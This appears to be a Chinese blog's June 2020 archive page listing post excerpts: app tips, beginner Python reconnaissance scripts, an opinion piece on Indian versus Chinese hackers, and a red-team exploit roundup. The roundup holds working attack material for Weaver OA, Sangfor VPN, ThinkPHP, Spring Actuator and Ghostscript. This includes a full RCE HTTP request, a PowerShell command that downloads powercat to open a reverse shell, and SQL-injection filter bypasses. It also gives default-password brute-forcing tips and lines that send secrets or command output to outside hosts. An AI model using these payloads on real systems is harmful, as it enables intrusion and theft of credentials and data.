网站首页 发表在 2020年06月 的所有文章

  • telegram(电报)汉化版教程

    Telegram是一个跨平台的实时通讯应用。Telegram的主要优势是,它非常安全、免费、没有广告并且功能强大。对比于其他同类通讯软件来说,在用户体验上做得非常好。但是,在国内是无法访问的,至于原因,大家都懂的。 加群里面有和汉化版tg、梯子 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="telegram(电报)汉化版教程" alt="telegram(电报)汉化版教程" border="0" width="750px" height="1344px" /> Telegram官网为:https://telegram.org/,目前已发布安卓、IOS、PC、Mac、Linux版本。已发布的版本中没有中文版,但官方为用户提供了汉化助手,用户可以手动轻松的将软件转为中文版。 下载并注册好 Telegram 后,在界面顶部的搜索框中输入@zh_CN(注意:包含@),进入“Telegram-zh_CN project”频道,在此频道内就能看到官方发布的汉化方法了,按照使用方法设置后,界面就能够以中文显示了。 ...

    2020-06-25 1865
  • 苹果安卓均可修改微信号了

    6月17日置顶:官方已通告,苹果手机也可以改了! 先把微信更新到最新版本,然后打开微信->我->设置->账户与安全->微信号->修改即可 (一年可以改一次)必须要是最新版微信,如果改不了退出重新登录试试! 还是没显示能修改就耐心等待,需要一个覆盖过程! 官方说明:https://mp.weixin.qq.com/s/uAJZ-9luDbTuLJuInGvGCA ...

    2020-06-20 470
  • 中国联通在线销户教程

    步骤如下: 1、打开联通营业厅APP--【服务】--【办理】--【销户】 2、根据要求上传所需要的资料即可,有多余的号的可以注销了  PS:话费余额可以转移到银行卡,其他手机账户,沃账户等等! 如果转移到银行卡的小伙伴小编建议在注销之前咨询下客服。 据说通过官方充值的才会退到银行卡 第三方充值的不行!...

    2020-06-20 602
  • 用python编写自动信息收集脚本(三) -ip收集

    本人只是python初学者,本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)!在日常渗透测试过程中我们都知道,在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利,所以信息收集格外重要。而信息收集往往费时间比较多,所以我们想写一个自动信息收集的脚本,但是代码量太大。本文就先从whois信息开始,代码不好的地方。希望大家提出意见! 本次模块配合之前的用python编写自动信息收集脚本一,二使用 import threading #多线程 import requests import time from lxml import etree import re #正则表达式 import csv import telnetlib #建立tcp链接 实现端口扫描 class xxsj(object):     def __init__(self):         global dk #创建全局变量,后面端口扫描用         self.wz = input("请输入您想查询的网站") #接收网站地址         dk = self.wz         self.a = re.sub(r"www.","",self.wz) #正则表达式,匹配www. 然后删除         self.header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'}     def ip(self):         url='https://dns.aizhan.com/' self.wz '/' # url地址         print("----在获取ip地址----")         response = requests.get(url=url, headers=self.header)         selector = etree.HTML(response.content)         title = "IP地址"         global ab #创建全局 ...

    2020-06-20 574
  • 用python编写自动信息收集脚本(二)网站信息搜集

    本人只是python初学者,本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)!在日常渗透测试过程中我们都知道,在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利,所以信息收集格外重要。而信息收集往往费时间比较多,所以我们想写一个自动信息收集的脚本,但是代码量太大。本文就先从whois信息开始,代码不好的地方。希望大家提出意见! 本次模块配合之前的用python编写自动信息收集脚本(一)使用 def xx(self):     url = 'https://www.aizhan.com/seo/' self.wz     response = requests.get(url=url, headers=self.header)     selector = etree.HTML(response.content)     title = selector.xpath('//*[@id="icp"]/li[1]/text()')[0]   #备案号 获取li[1]下的文本     infor = selector.xpath('//*[@id="icp_icp"]/text()')[0]   #备案信息     a = selector.xpath('//*[@id="icp_company"]/text()')[0]   #公司性质     b = selector.xpath('//*[@id="icp_type"]/text()')[0]    #公司名称     c = 1     for i in range(0, 2):     #写两次  将四个变量两次写人csv文件中         if c == 1:             self.write([title, infor])             c = c 1         else:             self.write([b, a]) ...

    2020-06-20 740
  • 用python编写自动信息收集脚本(一)

    本人只是python初学者,本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)! 在日常渗透测试过程中我们都知道,在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利,所以信息收集格外重要。而信息收集往往费时间比较多,所以我们想写一个自动信息收集的脚本,但是代码量太大。本文就先从whois信息开始,代码不好的地方。希望大家提出意见! import requests from lxml import etree import csv class xxsj(object):     def __init__(self):         self.header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'}     def whois(self):         wz = input('请输入您想信息收集的网站:')         print("正在whois查询",)         url = 'https://whois.aizhan.com/' wz         response = requests.get(url=url, headers=self.header)         selector = etree.HTML(response.content)         title = selector.xpath('//td[@class="thead"]/text()')         yuming = selector.xpath('//td[2]//text()')         a = len(title)         for i in range(0, a - 1):             title1 = title             yuming1 = yuming             self.write([title1, yuming1])     def write(self,lis):         with open('信息收集.csv', ...

    2020-06-20 988
  • 印度黑客能打赢对华网络战吗

    印度是一个对于自身实力有着迷之自信的国家,自从1947年脱离英国殖民统治建国以来,印度一直想要拥有控制南亚次大陆,并且将自己的影响力辐射到整个印度洋的能力,不过受限于本身实力的不足,印度的这种霸权主义思维更多是以吃瘪告终,前几天,中国与印度在边界冲突,中印军人打架,没动枪。打死好几个印度军人,印度最高一个上校被打死。印度全国民族主义高起,不买中国货,砸中国电视,中国手机。增兵冲突地区。我们中国也没示弱,一样大量增兵冲突地区。who 怕 who? 印度黑客也叫嚣要对华网络战。我们今天就来聊聊印度黑客能打赢对华网络战吗? 前几天,公民实验室Citizen Lab(简称:Citizen Lab)扒掉了一家印度公司的底裤。Citizen Lab的研究员称其正在进行:“有史以来规模最大的雇佣间谍活动之一。” BellTroXInfoTech(简称:BellTroX)是一家貌不惊人的印度信息技术服务公司,明面上,它扮演着好好先生的角色,是一家服务于医院、诊所、专家证人、独立从业者和企业等群体的转录和听写服务提供商。 背地里,他却则干着为客户提供黑客间谍情报服务的勾当,在长达7年的时间里对全球超过1万个电子邮件账户进行了入侵。把邪恶的触手伸向了欧洲的政府官员、巴哈马的博彩大亨以及美国著名投资机构等群体,其中就包括美国私募股权巨头KKR和做空机构浑水(Muddy Waters)。 没错,那家忙着调查别人家的公司,实际上,它也在被别人“调查”。 (BellTroX公司官网) “印度无名小IT公司”罪行初现端倪 2017年,一名被钓鱼攻击的记者向Citizen Lab求助,询问是否可以对不堪其扰的钓鱼邮件进行调查。随后,Citizen Lab对发来的钓鱼链接进行了溯源分析, Citizen Lab很快发现,这很可能是一个“黑客雇佣军”在全球范围内发起的黑客入侵活动。 CitizenLab将这一黑客雇佣军组织标记命名为 “Dark Basin”(黑暗盆地)。 跨越万里的邮件 ,一路追溯到印度 在对钓鱼链接进行了溯源分析时,Citizen Lab通过技术手段追查到了大量包含相同钓鱼链接的URL地址。在这里,Citizen Lab顺利的找到了抽丝剥茧的线头。 他们发现,在大量的钓鱼邮件中,有数百封邮件中的时间戳与印度UTC + 5:30时区的工作时间相吻合,可以加以猜测,这些邮件的源头可能是印度。 接下来,Citizen Lab又相继在Dark Basin组织使用的URL缩短服务中发现了几个与印度相关的名词:Holi,Rongali和Pochanchi,它们分别是印度宗教中两个著名的节日,以及音译的孟加拉数字“55”。 在钓鱼邮件的日志记录代码中,有些代码也以UTC + 5:30记录了时间戳,日志文件还显示Dark Basin似乎使用印度的IP地址进行了一些测试。 这绝非巧合。 毕竟再高超的黑客技术,也难以掩盖技术背后那些人的生活痕迹。 (Dark Basin使用的URL缩短服务) 有记忆的互联网,难以清除的蛛丝马迹 紧接着Citizen Lab继续顺着发现的线索一路查了下去,当他们在印度的一些网站进行信息检索时再次有了新发现。他们在领英上发现了一家名为BellTroX的公司。该公司雇员的工作职责描述写的十分耐人寻味,描述中这样写道:工作内容包括电子邮件渗透、广告推销、企业间谍、声波发射、提供网络情报等。 BellTroX公司的雇员们还在社交媒体上发帖赞扬了攻击技术,并附上了含有Dark Basin相关链接的截图。(BellTroX公司员工在社交媒体中发布的攻击技术讨论贴) 就这样经过一步步推敲,Citizen Lab最终捋清了Dark Basin与BellTroX之间千丝万缕的联系,BellTroX公司就是操纵Dark Basin组织的幕后黑手! 以往中国黑客,俄罗斯黑客、美国黑客会不时出现在新闻头条里,但现在印度黑客也开始崛起,成为一股不可忽视的力量。 由于历史原因,印度在经济上比较依赖欧美,经济联系也比较紧密。印度人在软件开发上有着语言上的优势,例如一个印度中学生把主要精力花在学软件上就行了,没有语言障碍。所以,欧美要搞外包,肯定会首选印度。印度去欧美留学的学生非常多,他们成绩好,无论在欧美工作还是在印度工作,都在学习。印度的教育体制是比较灵活的,他们为印度培养了一大批软件开发者以及各阶段的工人,他们接收着欧美的经营管理思想,为外包培养了一批先行者和管理者。但印度并不像中国一样,家家都买得起电脑,他们很喜欢通过技术赚钱,所以黑客安全组织也比较多,但很松散。因为他们的国家缺乏像美国硅谷那样的地方,无法将一些网络专家的技能转化为高薪工作,这也进一步带动了印度黑客文化的发展。 最近印度黑客安全组织也开始高调进入媒体的视线了,印度趁着我国爆发新型肺炎期间,黑客却盯上了我国肺炎的情况。利用新型病毒题材文档攻击。后来经过侦查发现,发起此种攻击的是印度的黑客组织APT,该黑客组织采用的是鱼叉式钓鱼攻击方式,通过邮件文档投递进行诱饵式入侵。只要医疗机构点开这些文件就会受到入侵。据业内人士分析称,印度黑客入侵我国医疗机构具有几种原因,一方面为了窃取我国最先进的医疗技术和信息,另一方面可能是为了窃取我国医疗设备数据,还有一种可能是,印度想要制造更多其它不稳定的因素!接着他们在一社交网站扬言印度黑客是世界第一,美国才第二。他们还表示,中国在互联网方面比较落后,还排不上名。到第二天,该黑客安全组织的网站被黑掉了,首页被挂上We come from China及一个星星标志;并且在社交网站发的那条说说也神奇地失踪了。据调查,这个的确是源自中国的标志,但策划这一行动的是在印的一个华人网络黑客安全小组干的,他们都是来自中国,并且声称是华夏黑客联盟的成员;他们是看不惯印度黑客组织的嚣张,所以才把它给黑了,并告诉他们:“懂英文不是炫耀的资本,懂技术才是真正的高手”。随后印度黑客组织被吓得魂不守舍,再也不敢高调了。 https://www.quora.com/Can-Indian-hackers-win-the-cyber-war-with-China 国外知乎,有网友提出这样一个问题 Can Indian hackers win the cyber war with China?印度黑客能打赢对华网络战吗? quora读者的评论:Dhruv ApteWell it might be shockingly true but Indian hackers might lose the race to Chinese ones....they are better trained and more sophisticated说出来也许你会震惊,不过印度黑客应该会输掉对华网络战。中国黑客更训练有素,技术更精湛。 Mihir Karbelkar, Studies at Vellore Institute of Technology, BhopalIt is not necessary that we wil lose against China. China may have many hackers but not all maybe very skilled. Indians utilise their resources effectively, forgot about Mars orbiter mission. If the "war" starts , at first, we will have less soldiers but we will progress and bring them down.我们不一定会输掉对华网络战。中国的黑客也许不少,但是并非所有黑客的技术都很精湛印度人会充分利用本国资源,比如印度就成功向火星发送了探测器。“战争”爆发初期,我们的黑客也许没他们多,不过我们会进步,然后打败他们 Abhishek Joshithe indian hackers will find it very hard to win a war againts chinease..i am not anti india but telling you the truth...Indian goverment does not have any organization unlike china where all hackers work together .In case of an cyber war the Indian goverment will first ask all hackers to retaliate but that can take some time...also note that china has used it technocrats in way to put all there efforts in defending there networks and trained them in an offensive way to attack cyber space.印度黑客会发现很难打赢对华网络战。我不是反印。跟你们说吧,印度政府并未建立黑客组织,而中国让所有黑客一起工作。一旦爆发网络战,印度政府会要求所有黑客发动报复,不过这需要时间来组织。 In china there is whole leading unit of army whose sole task is to attack cyber space, while in India we do not have any uniform structure.Also note that it is not neccesaary every Indian hacker will be that good so it hack there every website.Also note that language is other barieer as most of routers and computers in china are set to run on mandarian it will become more difficult for Indian hackers to attack there.中国有一支专门用来攻击网络的军队,而我们印度没有这样的组织。语言是一个障碍,中国大多数路由器和计算机用的是中文操纵系统,给印度黑客的入侵造成了更大的困难。 ...

    2020-06-20 462
  • 2020护网红方漏洞利用总结

      一年一度的护网马上要开始了,结合网上已公布的POC,总结了一部分最新的漏洞利用及修复方式,供大家参考。 1 泛微OA Bsh 远程代码执行漏洞 1. 漏洞简介 2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重. 2. 影响组件泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId=ecology/weaver/bsh.servlet.BshServlet 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA E-cology远程代码执行漏洞原理分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/215218.html https://github.com/beanshell/beanshell http://beanshell.org/manual/quickstart.html#The_BeanShell_GUI 6. 漏洞利用 Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204 POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: xxxxxxxx:8088 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 98 Content-Type: application/x-www-form-urlencoded bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 7. 利用技巧 1.其他形式绕过 eval%00("ex"%2b"ec(\"whoami\")"); 也可以换成 ex\u0065c("cmd /c dir"); 2.泛微多数都是windows环境, 反弹shell可以使用pcat Powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd 8. 防护方法 1.及时更新泛微补丁 2.拦截/weaver/bsh.servlet.BshServlet目录的访问 2 泛微OA e-cology SQL注入漏洞 1. 漏洞简介 泛微OA在国内的用户很多,漏洞以前也很多,但现在在漏洞盒子托管了企业SRC https://weaversrc.vulbox.com/, 情况有所好转 2. 影响组件 泛微OA 3. 漏洞指纹 Set-Cookie: ecology_JSessionId= ecology WorkflowCenterTreeData /mobile/plugin/SyncUserInfo.jsp 4. Fofa Dork app="泛微-协同办公OA" 5. 漏洞分析 泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区 https://xz.aliyun.com/t/6531 6. 漏洞利用 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现数据库小龙人-CSDN博客 https://blog.csdn.net/zycdn/article/details/102494037 Tentacle/ecology8_mobile_sql_inject.py at 6e1cecd52b10526c4851a26249339367101b3ca2 · orleven/Tentacle https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py 应用安全 – 软件漏洞 – 泛微OA漏洞汇总 – AdreamWillB – 博客园 https://www.cnblogs.com/AtesetEnginner/p/11558469.html /mobile/plugin/SyncUserInfo.jsp 这个也是有问题的, 但由于没有公开的分析报告, 漏洞相对简单, 这里不过多描述 7. 利用技巧 1.在这个漏洞补丁之前大概有几十个前台注入, 都差不多, 因为没公开这里就不细说了 2.泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了 3.这里可以绕过的原因是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,所以随便你填充%0a%0d还是空格都可以绕过注入检测 4.泛微后端数据库版本存在差异, 但是可以通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤方法并不一致所以这里筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格) "-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=('sysadmin'" 老版本可以在关键字后面加 /**/ 来绕过sql检测 新版本可以通过加入大量空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表 就Hrmresource表中没有用户, Hrmresourcemanager 表中也一定会存在sysadmin账户,所以进行union select的时候一定会有数据。这里也可以使用 "-1) "+" "*800+ " or/**/ 1=1 and id<(5",这里使用 <5 可以避免信息超过5条, 但是会返回密码等敏感信息, 不建议使用。 8. 防护方法 1.及时更新泛微补丁 2.泛微最好不要开放到公网 3.使用waf拦击 3 深信服VPN远程代码执行 1. 漏洞简介 深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过 2. 影响组件深信服 VPN 3. 漏洞指纹 Set-Cookie: TWFID=welcome to ssl vpn Sinfor 4. Fofa Dork header="Set-Cookie: TWFID=" 5. 漏洞分析 深信服vpnweb登录逆向学习 – potatso – 博客园 https://www.cnblogs.com/potatsoSec/p/12326356.html 6. 漏洞利用 wget -t %d -T %d --spider %s 7. 利用技巧 1.该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网 2.该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来 3.去除空格也简单 cat /etc/passwd | tr " \n" "+|" 8. 防护方法 1.及时更新补丁 2.升级到最新版 4 深信服 VPN 口令爆破 1. 漏洞简介 深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 所以这里爆破也不是不行, 主要是测试常见弱口令以及分布式爆破也不是不行 2. 影响组件深信服 VPN 3. 漏洞指纹 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd= 4. Fofa Dork app="深信服-SSL-VPN" 5. 漏洞分析 关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区 https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633 此处存疑, 时间问题没有测试 6. 漏洞利用 1.深信服VPN 口令爆破 demo (这里仅测试了M6,其他的应该差不多) #encoding=utf8 import requests import hashlib import urllib3 urllib3.disable_warnings() import re session = requests.session() def SanForLogin(target, password, username="admin"):     # 加密密码的算法是 sha1(password+sid)     # 没有公开POC就不写了 SanForLogin("https://xxxxxxxxxxx/", "admin") 7. 利用技巧 1.由于深信服涉及的版本跨度时间达十几年, 很多地方不一样, 但是总体都差不太多 国外APT组织应该也批量爆破了一波,加密的密码也就是 sha1(password+sid) 爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些admin/123456/Sangfor/Sangfor@123 2.如果爆破出来了管理员密码, 管理员后台有好多处命令注入, 比如升级工具, 这里讲起来应该是正常功能 3.去年传闻还有前台sql注入, 但是没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell https://www.uedbox.com/post/31092/ 8. 防护方法 1.及时更新补丁 2.升级到最新版 5 边界产品(防火墙, 网关, 路由器, VPN) 相关漏洞 1. 漏洞简介 大型企业往往会配置一些边界设备来维护企业内外网通信, 这里也存在灯下黑的问题, 由于多数不开源, 漏洞主要以弱口令为主 2. 影响组件 防火墙, 网关, 路由器, VPN 3. 漏洞指纹 防火墙, 网关, 路由器, VPN 4. Fofa Dork防火墙, 网关, 路由器, VPN 的名称 5. 漏洞分析 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 6. 漏洞利用 【安全设备】常见网络安全设备默认口令|IT2021.Com https://www.it2021.com/security/614.html 渗透测试之各厂商防火墙登录IP、初始密码、技术支持 https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA 7. 利用技巧 1.这个东西好多人不改默认口令, 就算改很多也是企业特色弱口令 admin root 123456 永远的神 内网的安全平台就是个漏洞指南 8. 防护方法 1.设置强口令 2.限制来源IP 6 Thinkphp 相关漏洞 1. 漏洞简介 Thinkphp 是国内很常见的PHP框架, 存在 远程代码执行/sql注入/反序列化/日志文件泄露等问题 2. 影响组件 Thinkphp 3. 漏洞指纹 Thinkphp X-Powered-By: ThinkPHP 4. Fofa Dork app="ThinkPHP" 5. 漏洞分析 ThinkPHP漏洞总结 – 赛克社区 http://zone.secevery.com/article/1165 挖掘暗藏ThinkPHP中的反序列利用链 – 斗象能力中心 https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/ ThinkPHP使用不当可能造成敏感信息泄露PHP_Fly鹏程万里-CSDN博客 https://blog.csdn.net/Fly_hps/article/details/81201904 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 6. 漏洞利用 SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编写 https://github.com/Dido1960/thinkphp whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具 https://github.com/whirlwind110/tphack 7. 利用技巧 1.遇到Thinkphp的站点看一下版本, 或者直接扫一下, 看看有没有rce, 或者日志文件泄露 2.自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中 3.实战中也看到偶尔有可以利用的情况, 运气好可能有惊喜, 刚好有篇新出的文章中使用到了这个漏洞 DSMall代码审计 – 安全客,安全资讯平台 https://www.anquanke.com/post/id/203461 8. 防护方法 1.及时更新补丁 2.升级到最新版Thinkphp 3.前置WAF进行防护 7 Spring 系列漏洞 1. 漏洞简介 Spring 是java web里最最最最常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒 2. 影响组件 Spring xxx 3. 漏洞指纹 X-Application-Context: 4. Fofa Dork app="Spring-Framework" 5. 漏洞分析 Spring 框架漏洞集合 ~ Misaki’s Blog https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/ Exploiting Spring Boot Actuators | Veracode blog https://www.veracode.com/blog/research/exploiting-spring-boot-actuators Spring Boot Actuators配置不当导致RCE漏洞复现 – JF ‘ blog https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/ 6. 漏洞利用 mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE https://github.com/mpgn/Spring-Boot-Actuator-Exploit artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads https://github.com/artsploit/yaml-payload 7. 利用技巧 1.Spring Boot Actuators 相关漏洞超级好用,很多厂商一开始都不懂, 直接对外开放Spring Boot Actuators, 造成了有一段时间每个用了Spring Boot的厂商都出了问题,尤其是现在很多厂商使用微服务框架, 通过网关进行路由分发, 一些子目录通常对应一个Spring Boot启动的服务。然后子目录比如 http://123.123.123.123/admin/env , http://123.123.123.123/manager/env也都是可以出现的/env 可以偷session, RCE/heapdump 可以直接dump jvm中的对象, 使用 jhat 可以读取里面的对象可以遍历如下的endpoint, 1.x 2.x的目录不一样, 所以都覆盖了一下 /trace /health /loggers /metrics /autoconfig /heapdump /threaddump /env /info /dump /configprops /mappings /auditevents /beans /jolokia /cloudfoundryapplication /hystrix.stream /actuator /actuator/auditevents /actuator/beans /actuator/health /actuator/conditions /actuator/configprops /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/metrics /actuator/scheduledtasks /actuator/httptrace /actuator/mappings /actuator/jolokia /actuator/hystrix.stream /monitor /monitor/auditevents /monitor/beans /monitor/health /monitor/conditions /monitor/configprops /monitor/env /monitor/info /monitor/loggers /monitor/heapdump /monitor/threaddump /monitor/metrics /monitor/scheduledtasks /monitor/httptrace /monitor/mappings /monitor/jolokia /monitor/hystrix.stream 这里通过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行一些默认操作,里面就有操作空间, 很像fastjson反序列化。 2.就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000 spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml 3.尤其是使用spring eureka做集群的时候, 通常拿到一台服务器, 就可以传递恶意注册到其他server, 从而感染整个微服务集群eureka 通常是 server 也是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了 8. 防护方法 1.及时更新补丁 2.开启Spring Boot Actuators权限校验 3.前置WAF进行防护 8 Solr 系列漏洞 1. 漏洞简介 Solr 是企业常见的全文搜索服务, 这两年也爆出很多安全漏洞, 2. 影响组件 Solr 3. 漏洞指纹 Solr 4. Fofa Dork app="Solr" 5. 漏洞分析 Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒体平台 https://www.freebuf.com/vuls/218730.html Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析 https://paper.seebug.org/1009/ 6. 漏洞利用 veracode-research/solr-injection: Apache Solr Injection Research https://github.com/veracode-research/solr-injection jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”) https://github.com/jas502n/CVE-2019-12409 mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit https://github.com/mogwailabs/mjet 7. 利用技巧 1.看到锤就完事了, 漏洞太多了, 一片一片的 2.遇到mjet连接超时,这是目标服务起返回了错误的stub(内网地址, 常见于docker), 可以使用socat进行流量转发, 后记里面有具体操作 8. 防护方法 1.升级到最新版 2.不要对外开放敏感端口 9 Ghostscript 上传图片代码执行 1. 漏洞简介 Ghostscript 是图像处理中十分常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过导致代码执行的问题影响广泛, 由于上传图片就有可能代码执行, 很多大厂中招 2. 影响组件 imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用 3. 漏洞指纹 .ps/.jpg/.png 4. Fofa Dork 5. 漏洞分析 ghostscript命令执行漏洞预警 – 安全客, 安全资讯平台 https://www.anquanke.com/post/id/157513 6. 漏洞利用 Exploit Database Search https://www.exploit-db.com/search?q=Ghostscript vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhub https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116 7. 利用技巧 1.如果发现网站可以上传图片, 且图片没有经过裁剪, 最后返回缩略图, 这里就可能存在Ghostscript 上传图片代码执行dnslog 可以用 ping `uname`.admin.ceye.io 或 ping `whoami`.admin.ceye.io保存成图片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不一样, 可以这样构造ping `whoami`.centos.admin.ceye.io / ping `whoami`.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这样测试的时候直接传2个文件, 通过DNSLOG可以区分是哪个poc执行的 8. 防护方法 1.升级到最新版 ...

    2020-06-19 2116
  • 2020护网参考学习 关于护网行动的总结

    截止到28日5点,护网行动终于结束,朋友圈感觉是在过年,到处是倒计时和庆祝声。看来防守方们7*24小时的看监控还是比较无奈的。本次复盘基于我对整个护网行动的观察总结而来,仅代表我个人观点,如有不妥之处,欢迎交流。 1. 整体攻防的思考   本次攻防,从规则到各方实力,都是绝无仅有的。经常有人问,是攻击队厉害还是防守队厉害?经过我这些年的思考,还是没有得出一个确切的结论。有时候觉得攻击队厉害,因为攻击可以在非特定时间随意发起,出其不意攻其不备,甚至手持0day指哪打哪,毕竟木桶原理决定着攻破一处即可内部突袭;有时候又觉得防守方厉害,因为防守方拥有全部访问流量,随时洞察攻击者的探测并封堵IP,也可以在主机层监控攻击者一举一动,甚至部署蜜罐玩弄黑客于鼓掌之中。总之,这么些年的摸爬滚打经验告诉我,攻防就是这样,道高一尺魔高一丈,一如黑客防线中说的“在攻于防的对立统一中寻求突破”。   2. 从攻击方思考   在真实的攻击行动中,一般一个目标要搞到核心系统根据防御程度不同,也需要1个月到半年的样子,甚至APT要潜伏一到两年才能拿到自己想要的数据。而此次总共给攻击方的时间只有3个周,并且每个队伍据说10多个目标,这也就决定了攻击要快速、要自动化。   a) 分布式扫描器   要说快速,还是得上扫描器,但是一个扫描器速度肯定不行,再者,被发现攻击行为,立马IP被ban掉,后续就无法进行。所以,分布式扫描器在这种情况下一定是个趋势。首先对全部目标的全端口进行一次扫描+端口识别,根据Banner快速收割一轮;   在这个过程中就会有个陷阱,比如在收集二级域名时,经常采用字典爆破,而防守方会设置一个诱饵二级域名,把流量引入蜜罐之中,坐等攻击方上钩。这时就需要攻击方们机灵一点,时刻反思这个是不是蜜罐。   对于AWVS的扫描器,还需升级到最新版,别被防御方反制,毕竟老版本扫描器自身就存在一个RCE。   b) 菜刀?蚁剑?冰蝎?   